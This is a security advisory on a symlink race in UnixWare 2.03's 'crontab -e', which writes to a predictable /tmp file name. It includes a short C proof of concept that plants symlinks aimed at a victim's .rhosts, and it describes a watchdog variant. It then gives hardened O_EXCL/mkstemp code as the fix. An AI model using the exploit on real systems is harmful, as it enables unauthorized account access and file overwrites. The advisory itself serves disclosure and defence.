Vulnerability: crontab

Affected: Novell UnixWare 2.03 (UNIX System V Release 4.2 MP), possibly other versions of UnixWare.

Description:

The 'crontab -e' command creates a temporary file in /tmp to pass the crontab file to a text editor for editing. The name of the file is easily guessable and appears to be based on the process ID (e.g. /tmp/crontaba00421). 'crontab -e' does not check whether the file already exists in /tmp and will gladly follow any symbolic link that happens to be waiting there.

A malicious user who knows that someone is about to edit his or her crontab file can create a bunch of symbolic links in /tmp with a little C program. The code might be something like this:

  #include <stdio.h>
  #include <unistd.h>

  /* Candidate characters for the two unknown positions of the temp file name. */
  char *foo = "0123456789ABCDEF";

  int main(void)
  {
      char *ps1, *ps2, s[32];

      /* Pre-create every /tmp/crontaba002?? name as a symlink to the victim's .rhosts. */
      for (ps1 = foo; *ps1; ps1++)
          for (ps2 = foo; *ps2; ps2++) {
              sprintf(s, "/tmp/crontaba002%c%c", *ps1, *ps2);
              symlink("/home/joe/.rhosts", s);
          }
      return 0;
  }

Now when joe edits his crontab file, it is saved as .rhosts in his home directory. This is dangerous because crontab files often contain characters such as '*', which acts as a wildcard in .rhosts.

The victim does not have to be joe. A malicious user might build a watchdog which replaces the symbolic link with a new one (e.g. pointing to /home/sam/.rhosts) while the user is editing his crontab file (a watchdog that looks for processes such as 'crontab -e' and 'pico /tmp/crontab*'). By replacing the symbolic link while the user is editing the crontab file, a malicious user might also be able to overwrite any file owned by that user.
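The fix on the crontab side, as an added illustration that is not code from the advisory or from UnixWare's crontab: create the edit buffer with O_CREAT|O_EXCL under an unpredictable mkstemp(3) name, so a pre-planted symlink is refused rather than followed. The function names and the demo paths are my own assumptions.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700      /* POSIX.1-2008: mkstemp, O_NOFOLLOW */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened counterpart of the predictable "/tmp/crontabaNNNNN" open:
 * O_CREAT|O_EXCL makes the kernel create the file itself and fail (EEXIST)
 * if anything, a planted symlink included, already sits at the path.
 * O_NOFOLLOW is defence in depth. Returns a descriptor, or -1 with errno. */
int create_exclusive(const char *path) {
    int flags = O_RDWR | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    return open(path, flags, S_IRUSR | S_IWUSR);
}

/* Create the edit buffer under an unpredictable name with mkstemp(3), which
 * opens with O_CREAT|O_EXCL internally; buf receives the final path. */
int create_edit_buffer(char *buf, size_t buflen) {
    if (snprintf(buf, buflen, "/tmp/crontab.XXXXXX") >= (int)buflen) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return mkstemp(buf);
}

/* Self-check: plant a dangling symlink at a known name (what the advisory's
 * loop does), confirm create_exclusive() refuses it, then confirm the
 * random-name buffer is still created. Returns 1 on success, 0 otherwise. */
int demo(void) {
    char lnk[64], editbuf[64];
    int fd, efd, refused, created;
    snprintf(lnk, sizeof lnk, "/tmp/crontab-demo-%ld", (long)getpid());
    unlink(lnk);
    if (symlink("/nonexistent/crontab-demo-target", lnk) != 0) return 0;
    fd = create_exclusive(lnk);
    refused = (fd == -1 && (errno == EEXIST || errno == ELOOP)); /* ELOOP if NOFOLLOW wins */
    if (fd >= 0) close(fd);
    unlink(lnk);
    efd = create_edit_buffer(editbuf, sizeof editbuf);
    created = (efd >= 0);
    if (efd >= 0) { close(efd); unlink(editbuf); }
    return refused && created;
}
```

The same O_EXCL rule applies to every later reopen of the buffer: if the editor or crontab ever reopens by name without it, the watchdog variant described above still has a window.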